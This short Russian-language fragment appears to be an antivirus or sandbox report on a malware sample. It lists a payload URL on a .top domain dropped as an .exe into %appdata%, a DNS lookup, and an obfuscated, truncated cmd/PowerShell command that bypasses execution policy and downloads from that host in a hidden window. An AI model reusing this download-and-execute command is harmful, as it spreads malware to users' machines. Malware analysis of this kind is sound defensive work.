Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ower^sheLl^.eXe^ -E^xe^c^u^t^IOnp^o^L^IcY^ bY^PaSS -nopR^of^ILe -Wind^oWstylE ^HIdD^En^ (ne^W^-obj^E^CT ^sYS^teM.neT.web^C^li^Ent)^.D^ow^NLOa^dFi^l^E('http://newyeargoka.top/rea...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "p^ower^sheLl^.eXe^ -E^xe^c^u^t^IOnp^o^L^IcY^ bY^PaSS -nopR^of^ILe -Wind^oWstylE ^HIdD^En^ (ne^W^-obj^E^CT ^sYS^teM.neT.web^C^li^Ent)^.D^ow^NLOa^dFi^l^E('http://newyeargoka.top/rea...' (со скрытым окном)